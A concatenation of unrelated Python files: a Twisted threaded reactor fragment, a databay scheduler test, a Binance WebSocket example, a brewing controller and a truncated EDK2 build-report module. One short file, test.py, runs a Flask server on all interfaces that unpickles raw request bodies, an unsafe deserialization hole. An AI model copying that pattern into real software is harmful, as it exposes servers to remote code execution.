fn, *args): self.toThreadQueue.put((fn, args)) def _preenDescriptorsInThread(self): log.msg("Malformed file descriptor found. Preening lists.") readers = self.reads.keys() writers = self.writes.keys() self.reads.clear() self.writes.clear() for selDict, selList in ((self.reads, readers), (self.writes, writers)): for selectable in selList: try: select.select([selectable], [selectable], [selectable], 0) except BaseException: log.msg("bad descriptor %s" % selectable) else: selDict[selectable] = 1 def _workerInThread(self): try: while 1: fn, args = self.toThreadQueue.get() fn(*args) except SystemExit: pass # Exception indicates this thread should exit except BaseException: f = failure.Failure() self._sendToMain("Failure", f) def _doSelectInThread(self, timeout): """Run one iteration of the I/O monitor loop. This will run all selectables who had input or output readiness waiting for them. """ reads = self.reads writes = self.writes while 1: try: r, w, ignored = _select(reads.keys(), writes.keys(), [], timeout) break except ValueError: # Possibly a file descriptor has gone negative? log.err() self._preenDescriptorsInThread() except TypeError: # Something *totally* invalid (object w/o fileno, non-integral # result) was passed log.err() self._preenDescriptorsInThread() except OSError as se: # select(2) encountered an error if se.args[0] in (0, 2): # windows does this if it got an empty list if (not reads) and (not writes): return else: raise elif se.args[0] == EINTR: return elif se.args[0] == EBADF: self._preenDescriptorsInThread() else: # OK, I really don't know what's going on. Blow up. raise self._sendToMain("Notify", r, w) def _process_Notify(self, r, w): reads = self.reads writes = self.writes _drdw = self._doReadOrWrite _logrun = log.callWithLogger for selectables, method, dct in ((r, "doRead", reads), (w, "doWrite", writes)): for selectable in selectables: # if this was disconnected in another thread, kill it. if selectable not in dct: continue # This for pausing input when we're not ready for more. _logrun(selectable, _drdw, selectable, method, dct) def _process_Failure(self, f): f.raiseException() _doIterationInThread = _doSelectInThread def ensureWorkerThread(self): if self.workerThread is None or not self.workerThread.isAlive(): self.workerThread = Thread(target=self._workerInThread) self.workerThread.start() def doThreadIteration(self, timeout): self._sendToThread(self._doIterationInThread, timeout) self.ensureWorkerThread() msg, args = self.toMainThread.get() getattr(self, "_process_" + msg)(*args) doIteration = doThreadIteration def _interleave(self): while self.running: self.runUntilCurrent() t2 = self.timeout() t = self.running and t2 self._sendToThread(self._doIterationInThread, t) yield None msg, args = self.toMainThread.get_nowait() getattr(self, "_process_" + msg)(*args) def interleave(self, waker, *args, **kw): """ interleave(waker) interleaves this reactor with the current application by moving the blocking parts of the reactor (select() in this case) to a separate thread. This is typically useful for integration with GUI applications which have their own event loop already running. See the module docstring for more information. """ self.startRunning(*args, **kw) loop = self._interleave() def mainWaker(waker=waker, loop=loop): waker(partial(next, loop)) self.mainWaker = mainWaker next(loop) self.ensureWorkerThread() def _mainLoopShutdown(self): self.mainWaker = None if self.workerThread is not None: self._sendToThread(raiseException, SystemExit) self.wakeUp() try: while 1: msg, args = self.toMainThread.get_nowait() except Empty: pass self.workerThread.join() self.workerThread = None try: while 1: fn, args = self.toThreadQueue.get_nowait() if fn is self._doIterationInThread: log.msg("Iteration is still in the thread queue!") elif fn is raiseException and args[0] is SystemExit: pass else: fn(*args) except Empty: pass def _doReadOrWrite(self, selectable, method, dict): try: why = getattr(selectable, method)() handfn = getattr(selectable, "fileno", None) if not handfn: why = _NO_FILENO elif handfn() == -1: why = _NO_FILEDESC except BaseException: why = sys.exc_info()[1] log.err() if why: self._disconnectSelectable(selectable, why, method == "doRead") def addReader(self, reader): """Add a FileDescriptor for notification of data available to read.""" self._sendToThread(self.reads.__setitem__, reader, 1) self.wakeUp() def addWriter(self, writer): """Add a FileDescriptor for notification of data available to write.""" self._sendToThread(self.writes.__setitem__, writer, 1) self.wakeUp() def removeReader(self, reader): """Remove a Selectable for notification of data available to read.""" self._sendToThread(dictRemove, self.reads, reader) def removeWriter(self, writer): """Remove a Selectable for notification of data available to write.""" self._sendToThread(dictRemove, self.writes, writer) def removeAll(self): return self._removeAll(self.reads, self.writes) def getReaders(self): return list(self.reads.keys()) def getWriters(self): return list(self.writes.keys()) def stop(self): """ Extend the base stop implementation to also wake up the select thread so that C{runUntilCurrent} notices the reactor should stop. """ posixbase.PosixReactorBase.stop(self) self.wakeUp() def run(self, installSignalHandlers=True): self.startRunning(installSignalHandlers=installSignalHandlers) self.mainLoop() def mainLoop(self): q = Queue() self.interleave(q.put) while self.running: try: q.get()() except StopIteration: break def install(): """Configure the twisted mainloop to be run using the select() reactor.""" reactor = ThreadedSelectReactor() from twisted.internet.main import installReactor installReactor(reactor) return reactor __all__ = ["install"]
test.py
from flask import Flask, request import requests from threading import Thread import time, pickle def start_server(): app = Flask(__name__) @app.route('/test', methods=['POST']) def test(): print(pickle.loads(request.get_data())) return "", 200 app.run(host='0.0.0.0', port=3000) try: server = Thread(target=start_server) server.daemon = True server.start() requests.post('http://127.0.0.1:3000/test', data=pickle.dumps({b'123': b'456'})) while True: time.sleep(1) except (KeyboardInterrupt, SystemExit): exit()
test_schedule_planner.py
import logging import time from threading import Thread from unittest import TestCase from unittest.mock import MagicMock import schedule import databay from databay import Link from databay.errors import MissingLinkError from databay.planners import SchedulePlanner from databay.planners.schedule_planner import ScheduleIntervalError from test_utils import fqname, DummyException, DummyUnusualException class TestSchedulePlanner(TestCase): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) logging.getLogger('databay').setLevel(logging.WARNING) def setUp(self): self.planner = SchedulePlanner(refresh_interval=0.02) link = MagicMock(spec=Link) def set_job(job): link.job = job link.interval.total_seconds.return_value = 0.02 link.set_job.side_effect = set_job link.job = None link.immediate_transfer = True self.link = link def tearDown(self): if len(schedule.jobs) > 0: schedule.clear() def test__run_job(self): self.planner._create_thread_pool() self.planner._run_job(self.link) self.link.transfer.assert_called_once() self.planner._destroy_thread_pool() def test__schedule(self): self.planner._schedule(self.link) self.assertIsNotNone(self.link.job, 'Link should contain a job') schedule_job = schedule.jobs[0] self.assertEqual(self.link.job, schedule_job, 'Link\'s job should be same as schedule\'s') # self.planner._unschedule(link) def test__unschedule(self): self.planner._schedule(self.link) self.planner._unschedule(self.link) self.assertIsNone(self.link.job, 'Link should not contain a job') self.assertEqual(len(schedule.jobs), 0, 'Schedule should not have any jobs') def test__unschedule_invalid(self): self.planner._unschedule(self.link) self.assertIsNone(self.link.job, 'Link should not contain a job') self.assertEqual(len(schedule.jobs), 0, 'Scheduler should not have any jobs') def test_add_links(self): self.planner.add_links(self.link) self.assertIsNotNone(self.link.job, 'Link should contain a job') self.assertTrue(self.link in self.planner.links, 'Planner should contain the link') def test_add_links_on_init(self): self.planner = SchedulePlanner(self.link, refresh_interval=0.02) self.assertIsNotNone(self.link.job, 'Link should contain a job') self.assertTrue(self.link in self.planner.links, 'Planner should contain the link') def test_remove_links(self): self.planner.add_links(self.link) self.planner.remove_links(self.link) self.assertIsNone(self.link.job, 'Link should not contain a job') self.assertTrue(self.link not in self.planner.links, 'Planner should not contain the link') def test_remove_invalid_link(self): self.assertRaises(MissingLinkError, self.planner.remove_links, self.link) self.assertIsNone(self.link.job, 'Link should not contain a job') self.assertTrue(self.link not in self.planner.links, 'Planner should not contain the link') def test_start(self): th = Thread(target=self.planner.start, daemon=True) th.start() self.assertTrue(self.planner._running, 'Planner should be running') self.planner.shutdown() th.join(timeout=2) self.assertFalse(th.is_alive(), 'Thread should be stopped.') def test_start_when_already_running(self): th = Thread(target=self.planner.start, daemon=True) th.start() self.assertTrue(self.planner._running, 'Planner should be running') th2 = Thread(target=self.planner.start, daemon=True) th2.start() self.assertFalse(th2.is_alive(), 'Starting again should instantly exit.') self.planner.shutdown() th.join(timeout=2) self.assertFalse(th.is_alive(), 'Thread should be stopped.') def test_shutdown(self): th = Thread(target=self.planner.start, daemon=True) th.start() self.planner.shutdown() self.assertFalse(self.planner._running, 'Planner should be not running') self.assertIsNone(self.planner._thread_pool, 'Planner should not have a thread pool') th.join(timeout=2) self.assertFalse(th.is_alive(), 'Thread should be stopped.') def test_add_and_run(self): self.link.interval.total_seconds.return_value = 0.02 self.planner._refresh_interval = 0.02 self.planner.add_links(self.link) th = Thread(target=self.planner.start, daemon=True) th.start() time.sleep(0.04) self.link.transfer.assert_called() self.planner.shutdown() th.join(timeout=2) self.assertFalse(th.is_alive(), 'Thread should be stopped.') def test_invalid_interval(self): self.link.interval.total_seconds.return_value = 0.1 self.planner._refresh_interval = 0.2 self.assertRaises(ScheduleIntervalError, self.planner.add_links, self.link) def _with_exception(self, link, ignore_exceptions): self.planner = SchedulePlanner(ignore_exceptions=ignore_exceptions) self.planner.immediate_transfer = False # otherwise planner will never start link.transfer.side_effect = DummyException() link.interval.total_seconds.return_value = 0.02 self.planner._refresh_interval = 0.02 link.transfer.side_effect = DummyException() link.interval.total_seconds.return_value = 0.02 self.planner.add_links(link) with self.assertLogs(logging.getLogger('databay.BasePlanner'), level='WARNING') as cm: th = Thread(target=self.planner.start, daemon=True) th.start() time.sleep(0.04) link.transfer.assert_called() if ignore_exceptions: self.assertTrue(self.planner.running, 'Planner should be running') self.planner.shutdown(wait=False) th.join(timeout=2) self.assertFalse(th.is_alive(), 'Thread should be stopped.') self.assertFalse(self.planner.running, 'Planner should be stopped') self.assertTrue( 'I\'m a dummy exception' in ';'.join(cm.output)) def test_ignore_exception(self): self._with_exception(self.link, True) def test_raise_exception(self): self._with_exception(self.link, False) def test_uncommon_exception(self): self.link.transfer.side_effect = DummyUnusualException( argA=123, argB=True) self.link.interval.total_seconds.return_value = 0.02 self.planner.add_links(self.link) with self.assertLogs(logging.getLogger('databay.BasePlanner'), level='WARNING') as cm: th = Thread(target=self.planner.start, daemon=True) th.start() time.sleep(0.04) self.link.transfer.assert_called() self.assertFalse(self.planner.running, 'Scheduler should be stopped') self.assertTrue( '123, True, I\'m an unusual dummy exception' in ';'.join(cm.output)) def test_purge(self): self.link.interval.total_seconds.return_value = 0.02 self.planner.add_links(self.link) self.planner.purge() self.link.set_job.assert_called_with(None) self.assertEqual(self.planner.links, []) self.assertEqual(schedule.jobs, []) def test_purge_while_running(self): self.planner.add_links(self.link) th = Thread(target=self.planner.start, daemon=True) th.start() self.planner.purge() self.link.set_job.assert_called_with(None) self.assertEqual(self.planner.links, []) self.assertEqual(schedule.jobs, []) self.planner.shutdown() th.join(timeout=2) self.assertFalse(th.is_alive(), 'Thread should be stopped.') def test_start_when_already_running(self): th = Thread(target=self.planner.start, daemon=True) th.start() self.assertTrue(self.planner._running, 'Planner should be running') th2 = Thread(target=self.planner._start_planner, daemon=True) th2.start() # this shouldn't do anything as we're already running th2.join() self.assertFalse(th2.is_alive(), 'Second start thread should have exited.') self.planner.shutdown() th.join(timeout=2) self.assertFalse(th.is_alive(), 'Thread should be stopped.') def test_immediate_transfer(self): self.link.interval.total_seconds.return_value = 10 self.planner.add_links(self.link) th = Thread(target=self.planner.start, daemon=True) th.start() time.sleep(0.01) self.link.transfer.assert_called_once() self.planner.shutdown() th.join(timeout=2) self.assertFalse(th.is_alive(), 'Thread should be stopped.') def test_immediate_transfer_exception(self): self.link.interval.total_seconds.return_value = 10 self.planner._ignore_exceptions = False self.link.transfer.side_effect = DummyException('First transfer exception!') self.planner.add_links(self.link) with self.assertLogs(logging.getLogger('databay.BasePlanner'), level='WARNING') as cm: th = Thread(target=self.planner.start, daemon=True) th.start() self.link.transfer.assert_called_once() self.assertFalse(self.planner.running, 'Planner should not have started') th.join(timeout=2) self.assertFalse(th.is_alive(), 'Thread should be stopped.') self.assertTrue( 'First transfer exception!' in ';'.join(cm.output)) def test_immediate_transfer_off(self): self.link.interval.total_seconds.return_value = 10 self.planner.immediate_transfer = False self.planner.add_links(self.link) th = Thread(target=self.planner.start, daemon=True) th.start() time.sleep(0.01) self.link.transfer.assert_not_called() self.planner.shutdown() th.join(timeout=2) self.assertFalse(th.is_alive(), 'Thread should be stopped.')
example_binance_us.py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # File: example_binance_us.py # # Part of ‘UNICORN Binance WebSocket API’ # Project website: https://www.lucit.tech/unicorn-binance-websocket-api.html # Github: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api # Documentation: https://unicorn-binance-websocket-api.docs.lucit.tech # PyPI: https://pypi.org/project/unicorn-binance-websocket-api/ # # Author: LUCIT Systems and Development # # Copyright (c) 2019-2022, LUCIT Systems and Development (https://www.lucit.tech) and Oliver Zehentleitner # All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. from unicorn_binance_websocket_api.manager import BinanceWebSocketApiManager import logging import time import threading import os def print_stream_data_from_stream_buffer(binance_websocket_api_manager): while True: if binance_websocket_api_manager.is_manager_stopping(): exit(0) oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer() if oldest_stream_data_from_stream_buffer is False: time.sleep(0.01) logging.getLogger("unicorn_binance_websocket_api") logging.basicConfig(level=logging.INFO, filename=os.path.basename(__file__) + '.log', format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}", style="{") # create instance of BinanceWebSocketApiManager for Binance Jersey binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.us") userdata_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!userData"], api_key="aaa", api_secret="bb") ticker_all_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!ticker"]) miniticker_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!miniTicker"]) markets = {'btcusd', 'btcxrp', 'ethusd', 'bnbusd', 'busdusd'} binance_websocket_api_manager.create_stream(["aggTrade"], markets) binance_websocket_api_manager.create_stream(["trade"], markets) binance_websocket_api_manager.create_stream(["kline_1m"], markets) binance_websocket_api_manager.create_stream(["kline_5m"], markets) binance_websocket_api_manager.create_stream(["kline_15m"], markets) binance_websocket_api_manager.create_stream(["kline_1h"], markets) binance_websocket_api_manager.create_stream(["kline_12h"], markets) binance_websocket_api_manager.create_stream(["kline_1w"], markets) binance_websocket_api_manager.create_stream(["ticker"], markets) binance_websocket_api_manager.create_stream(["miniTicker"], markets) binance_websocket_api_manager.create_stream(["depth"], markets) binance_websocket_api_manager.create_stream(["depth5"], markets) binance_websocket_api_manager.create_stream(["depth10"], markets) binance_websocket_api_manager.create_stream(["depth20"], markets) binance_websocket_api_manager.create_stream(["aggTrade"], markets) channels = {'trade', 'kline_1m', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_12h', 'kline_1w', 'miniTicker', 'depth20'} binance_websocket_api_manager.create_stream(channels, markets) # start a worker process to move the received stream_data from the stream_buffer to a print function worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,)) worker_thread.start() # show an overview while True: binance_websocket_api_manager.print_summary() time.sleep(1)
Program.py
from PyQt4.QtCore import * # Qt core from PyQt4.QtGui import * # Qt GUI interface from PyQt4.uic import * # ui files realizer from PyQt4 import QtGui, uic from operator import methodcaller import threading import time # # simple machine for running a mash program # # the machine consumes a text file with commands # # tm <temp> set mash setpoint to temperature <temp>. Will cause error if the HLT is colder than <temp> # th <temp> set HLT setpoint to temperature <temp> # wait_time <seconds> wait for <seconds> seconds, then continue # stepname <text> displays the <text> as step name in the gui # wait_tm <temp> wait until mash temp is <temp> # wait_th <temp> wait until hlt temp is <temp> # beep sound the alarm # requester <text> show a requester with text and wait for the user to click OK class MyTableModel(QAbstractTableModel): def __init__(self, datain, parent=None, *args): QAbstractTableModel.__init__(self, parent, *args) self.arraydata = datain def rowCount(self, parent): return len(self.arraydata) def columnCount(self, parent): return len(self.arraydata[0]) def data(self, index, role): #print(index) if not index.isValid(): return QVariant() elif role != Qt.DisplayRole: return QVariant() return QVariant(self.arraydata[index.row()][index.column()]) class Program: oldstep=-1 step=-1 running = False runprogram = True waittime=time.time()+10 waittemp=False xdata = {} ydata = {} xdata["HLT"] = [] ydata["HLT"] = [] xdata["MLT"] = [] ydata["MLT"] = [] xdata["MLTSET"] = [] ydata["MLTSET"] = [] xdata["HLTSET"] = [] ydata["HLTSET"] = [] def execute_program(self): print("start program thread") while self.runprogram: time.sleep(0.1) if self.running and self.bt.serialAvailable(): if self.waittime>time.time(): continue if self.waittemp: if self.bt.getTemp(self.waittemp[0][1])<self.waittemp[1]: continue else: self.waittemp=False print "done waiting for temp" print(self.nextstep()) command = self.program[self.step][0] argument = self.program[self.step][1] alls = self.bt.getFullStatus() self.plot.annotate(alls["timestamp"],int(argument),command) if command in {"th","tm"}: print("setpoint "+command) self.bt.setSetpoint(command[1],argument) elif command in {"wait_th","wait_tm"}: print("waiting "+command) self.waittemp=[command.split("_")[1],argument] elif command=="wait_time": self.waittime = time.time()+int(argument) elif command=="autotune": print ("Autotuning - exiting program control") self.bt.autotune() self.runprogram=False else: print("fel error in program") self.runprogram=False def __init__(self, w, bt,plot,table): self.plot = plot self.bt = bt self.program = list() self.tableWidget = table self.thread = threading.Thread(target=self.execute_program) self.thread.start() def load(self,filename): with open(filename) as f: self.program = map(methodcaller("split", " "), f.read().splitlines()) #print(self.program) self.tablemodel = MyTableModel(self.program) self.tableWidget.setModel(self.tablemodel) #self.tableWidget.layoutChanged.emit() self.step = -1 self.oldstep = -1 self.tableWidget.setDisabled(1) def stopalarm(self): # code to change the alarm indicator back to inactive self.bt.stopAlarm() def nextstep(self): self.step = self.step + 1; if(self.step>=len(self.program)): self.step=-1 self.running=False return list() else: self.tableWidget.selectRow(self.step) return self.program[self.step] def update(self): # need to update the progress bars and display which step is active # change this fullstatus = self.bt.getFullStatus() # print ("step" + str(brewstep)) self.xdata["HLT"].append(fullstatus["timestamp"]) self.ydata["HLT"].append(float(fullstatus["HLT"]["temp"])) self.xdata["MLT"].append(fullstatus["timestamp"]) self.ydata["MLT"].append(float(fullstatus["MLT"]["temp"])) #print self.ydata self.xdata["MLTSET"].append(fullstatus["timestamp"]) self.ydata["MLTSET"].append(float(fullstatus["MLT"]["setpoint"])) #print self.ydata self.xdata["HLTSET"].append(fullstatus["timestamp"]) self.ydata["HLTSET"].append(float(fullstatus["HLT"]["setpoint"])) #print self.ydata self.plot.update_plot(self.xdata, self.ydata) def run(self): self.running=True
BuildReport.py
## @file # Routines for generating build report. # # This module contains the functionality to generate build report after # build all target completes successfully. # # Copyright (c) 2010 - 2018, Intel Corporation. All rights reserved.<BR> # This program and the accompanying materials # are licensed and made available under the terms and conditions of the BSD License # which accompanies this distribution. The full text of the license may be found at # http://opensource.org/licenses/bsd-license.php # # THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS, # WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED. # ## Import Modules # import Common.LongFilePathOs as os import re import platform import textwrap import traceback import sys import time import struct import hashlib import subprocess import threading from datetime import datetime from StringIO import StringIO from Common import EdkLogger from Common.Misc import SaveFileOnChange from Common.Misc import GuidStructureByteArrayToGuidString from Common.Misc import GuidStructureStringToGuidString from Common.InfClassObject import gComponentType2ModuleType from Common.BuildToolError import FILE_WRITE_FAILURE from Common.BuildToolError import CODE_ERROR from Common.BuildToolError import COMMAND_FAILURE from Common.BuildToolError import FORMAT_INVALID from Common.LongFilePathSupport import OpenLongFilePath as open from Common.MultipleWorkspace import MultipleWorkspace as mws import Common.GlobalData as GlobalData from AutoGen.AutoGen import ModuleAutoGen from Common.Misc import PathClass from Common.String import NormPath from Common.DataType import * import collections from Common.Expression import * ## Pattern to extract contents in EDK DXS files gDxsDependencyPattern = re.compile(r"DEPENDENCY_START(.+)DEPENDENCY_END", re.DOTALL) ## Pattern to find total FV total size, occupied size in flash report intermediate file gFvTotalSizePattern = re.compile(r"EFI_FV_TOTAL_SIZE = (0x[0-9a-fA-F]+)") gFvTakenSizePattern = re.compile(r"EFI_FV_TAKEN_SIZE = (0x[0-9a-fA-F]+)") ## Pattern to find module size and time stamp in module summary report intermediate file gModuleSizePattern = re.compile(r"MODULE_SIZE = (\d+)") gTimeStampPattern = re.compile(r"TIME_STAMP = (\d+)") ## Pattern to find GUID value in flash description files gPcdGuidPattern = re.compile(r"PCD\((\w+)[.](\w+)\)") ## Pattern to collect offset, GUID value pair in the flash report intermediate file gOffsetGuidPattern = re.compile(r"(0x[0-9A-Fa-f]+) ([-A-Fa-f0-9]+)") ## Pattern to find module base address and entry point in fixed flash map file gModulePattern = r"\n[-\w]+\s*\(([^,]+),\s*BaseAddress=%(Address)s,\s*EntryPoint=%(Address)s\)\s*\(GUID=([-0-9A-Fa-f]+)[^)]*\)" gMapFileItemPattern = re.compile(gModulePattern % {"Address" : "(-?0[xX][0-9A-Fa-f]+)"}) ## Pattern to find all module referenced header files in source files gIncludePattern = re.compile(r'#include\s*["<]([^">]+)[">]') gIncludePattern2 = re.compile(r"#include\s+EFI_([A-Z_]+)\s*[(]\s*(\w+)\s*[)]") ## Pattern to find the entry point for EDK module using EDKII Glue library gGlueLibEntryPoint = re.compile(r"__EDKII_GLUE_MODULE_ENTRY_POINT__\s*=\s*(\w+)") ## Tags for MaxLength of line in report gLineMaxLength = 120 ## Tags for end of line in report gEndOfLine = "\r\n" ## Tags for section start, end and separator gSectionStart = ">" + "=" * (gLineMaxLength - 2) + "<" gSectionEnd = "<" + "=" * (gLineMaxLength - 2) + ">" + "\n" gSectionSep = "=" * gLineMaxLength ## Tags for subsection start, end and separator gSubSectionStart = ">" + "-" * (gLineMaxLength - 2) + "<" gSubSectionEnd = "<" + "-" * (gLineMaxLength - 2) + ">" gSubSectionSep = "-" * gLineMaxLength ## The look up table to map PCD type to pair of report display type and DEC type gPcdTypeMap = { 'FixedAtBuild' : ('FIXED', 'FixedAtBuild'), 'PatchableInModule': ('PATCH', 'PatchableInModule'), 'FeatureFlag' : ('FLAG', 'FeatureFlag'), 'Dynamic' : ('DYN', 'Dynamic'), 'DynamicHii' : ('DYNHII', 'Dynamic'), 'DynamicVpd' : ('DYNVPD', 'Dynamic'), 'DynamicEx' : ('DEX', 'DynamicEx'), 'DynamicExHii' : ('DEXHII', 'DynamicEx'), 'DynamicExVpd' : ('DEXVPD', 'DynamicEx'), } ## The look up table to map module type to driver type gDriverTypeMap = { 'SEC' : '0x3 (SECURITY_CORE)', 'PEI_CORE' : '0x4 (PEI_CORE)', 'PEIM' : '0x6 (PEIM)', 'DXE_CORE' : '0x5 (DXE_CORE)', 'DXE_DRIVER' : '0x7 (DRIVER)', 'DXE_SAL_DRIVER' : '0x7 (DRIVER)', 'DXE_SMM_DRIVER' : '0x7 (DRIVER)', 'DXE_RUNTIME_DRIVER': '0x7 (DRIVER)', 'UEFI_DRIVER' : '0x7 (DRIVER)', 'UEFI_APPLICATION' : '0x9 (APPLICATION)', 'SMM_CORE' : '0xD (SMM_CORE)', 'SMM_DRIVER' : '0xA (SMM)', # Extension of module type to support PI 1.1 SMM drivers 'MM_STANDALONE' : '0xE (MM_STANDALONE)', 'MM_CORE_STANDALONE' : '0xF (MM_CORE_STANDALONE)' } ## The look up table of the supported opcode in the dependency expression binaries gOpCodeList = ["BEFORE", "AFTER", "PUSH", "AND", "OR", "NOT", "TRUE", "FALSE", "END", "SOR"] ## # Writes a string to the file object. # # This function writes a string to the file object and a new line is appended # afterwards. It may optionally wraps the string for better readability. # # @File The file object to write # @String The string to be written to the file # @Wrapper Indicates whether to wrap the string # def FileWrite(File, String, Wrapper=False): if Wrapper: String = textwrap.fill(String, 120) File.write(String + gEndOfLine) def ByteArrayForamt(Value): IsByteArray = False SplitNum = 16 ArrayList = [] if Value.startswith('{') and Value.endswith('}'): Value = Value[1:-1] ValueList = Value.split(',') if len(ValueList) >= SplitNum: IsByteArray = True if IsByteArray: if ValueList: Len = len(ValueList)/SplitNum for i, element in enumerate(ValueList): ValueList[i] = '0x%02X' % int(element.strip(), 16) if Len: Id = 0 while (Id <= Len): End = min(SplitNum*(Id+1), len(ValueList)) Str = ','.join(ValueList[SplitNum*Id : End]) if End == len(ValueList): Str += '}' ArrayList.append(Str) break else: Str += ',' ArrayList.append(Str) Id += 1 else: ArrayList = [Value + '}'] return IsByteArray, ArrayList ## # Find all the header file that the module source directly includes. # # This function scans source code to find all header files the module may # include. This is not accurate but very effective to find all the header # file the module might include with #include statement. # # @Source The source file name # @IncludePathList The list of include path to find the source file. # @IncludeFiles The dictionary of current found include files. # def FindIncludeFiles(Source, IncludePathList, IncludeFiles): FileContents = open(Source).read() # # Find header files with pattern #include "XXX.h" or #include <XXX.h> # for Match in gIncludePattern.finditer(FileContents): FileName = Match.group(1).strip() for Dir in [os.path.dirname(Source)] + IncludePathList: FullFileName = os.path.normpath(os.path.join(Dir, FileName)) if os.path.exists(FullFileName): IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName break # # Find header files with pattern like #include EFI_PPI_CONSUMER(XXX) # for Match in gIncludePattern2.finditer(FileContents): Key = Match.group(2) Type = Match.group(1) if "ARCH_PROTOCOL" in Type: FileName = "ArchProtocol/%(Key)s/%(Key)s.h" % {"Key" : Key} elif "PROTOCOL" in Type: FileName = "Protocol/%(Key)s/%(Key)s.h" % {"Key" : Key} elif "PPI" in Type: FileName = "Ppi/%(Key)s/%(Key)s.h" % {"Key" : Key} elif "GUID" in Type: FileName = "Guid/%(Key)s/%(Key)s.h" % {"Key" : Key} else: continue for Dir in IncludePathList: FullFileName = os.path.normpath(os.path.join(Dir, FileName)) if os.path.exists(FullFileName): IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName break ## Split each lines in file # # This method is used to split the lines in file to make the length of each line # less than MaxLength. # # @param Content The content of file # @param MaxLength The Max Length of the line # def FileLinesSplit(Content=None, MaxLength=None): ContentList = Content.split(TAB_LINE_BREAK) NewContent = '' NewContentList = [] for Line in ContentList: while len(Line.rstrip()) > MaxLength: LineSpaceIndex = Line.rfind(TAB_SPACE_SPLIT, 0, MaxLength) LineSlashIndex = Line.rfind(TAB_SLASH, 0, MaxLength) LineBackSlashIndex = Line.rfind(TAB_BACK_SLASH, 0, MaxLength) if max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex) > 0: LineBreakIndex = max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex) else: LineBreakIndex = MaxLength NewContentList.append(Line[:LineBreakIndex]) Line = Line[LineBreakIndex:] if Line: NewContentList.append(Line) for NewLine in NewContentList: NewContent += NewLine + TAB_LINE_BREAK NewContent = NewContent.replace(TAB_LINE_BREAK, gEndOfLine).replace('\r\r\n', gEndOfLine) return NewContent ## # Parse binary dependency expression section # # This utility class parses the dependency expression section and translate the readable # GUID name and value. # class DepexParser(object): ## # Constructor function for class DepexParser # # This constructor function collect GUID values so that the readable # GUID name can be translated. # # @param self The object pointer # @param Wa Workspace context information # def __init__(self, Wa): self._GuidDb = {} for Pa in Wa.AutoGenObjectList: for Package in Pa.PackageList: for Protocol in Package.Protocols: GuidValue = GuidStructureStringToGuidString(Package.Protocols[Protocol]) self._GuidDb[GuidValue.upper()] = Protocol for Ppi in Package.Ppis: GuidValue = GuidStructureStringToGuidString(Package.Ppis[Ppi]) self._GuidDb[GuidValue.upper()] = Ppi for Guid in Package.Guids: GuidValue = GuidStructureStringToGuidString(Package.Guids[Guid]) self._GuidDb[GuidValue.upper()] = Guid ## # Parse the binary dependency expression files. # # This function parses the binary dependency expression file and translate it # to the instruction list. # # @param self The object pointer # @param DepexFileName The file name of binary dependency expression file. # def ParseDepexFile(self, DepexFileName): DepexFile = open(DepexFileName, "rb") DepexStatement = [] OpCode = DepexFile.read(1) while OpCode: Statement = gOpCodeList[struct.unpack("B", OpCode)[0]] if Statement in ["BEFORE", "AFTER", "PUSH"]: GuidValue = "%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X" % \ struct.unpack("=LHHBBBBBBBB", DepexFile.read(16)) GuidString = self._GuidDb.get(GuidValue, GuidValue) Statement = "%s %s" % (Statement, GuidString) DepexStatement.append(Statement) OpCode = DepexFile.read(1) return DepexStatement ## # Reports library information # # This class reports the module library subsection in the build report file. # class LibraryReport(object): ## # Constructor function for class LibraryReport # # This constructor function generates LibraryReport object for # a module. # # @param self The object pointer # @param M Module context information # def __init__(self, M): self.LibraryList = [] if int(str(M.AutoGenVersion), 0) >= 0x00010005: self._EdkIIModule = True else: self._EdkIIModule = False for Lib in M.DependentLibraryList: LibInfPath = str(Lib) LibClassList = Lib.LibraryClass[0].LibraryClass LibConstructorList = Lib.ConstructorList LibDesstructorList = Lib.DestructorList LibDepexList = Lib.DepexExpression[M.Arch, M.ModuleType] for LibAutoGen in M.LibraryAutoGenList: if LibInfPath == LibAutoGen.MetaFile.Path: LibTime = LibAutoGen.BuildTime break self.LibraryList.append((LibInfPath, LibClassList, LibConstructorList, LibDesstructorList, LibDepexList, LibTime)) ## # Generate report for module library information # # This function generates report for the module library. # If the module is EDKII style one, the additional library class, library # constructor/destructor and dependency expression may also be reported. # # @param self The object pointer # @param File The file object for report # def GenerateReport(self, File): if len(self.LibraryList) > 0: FileWrite(File, gSubSectionStart) FileWrite(File, TAB_BRG_LIBRARY) FileWrite(File, gSubSectionSep) for LibraryItem in self.LibraryList: 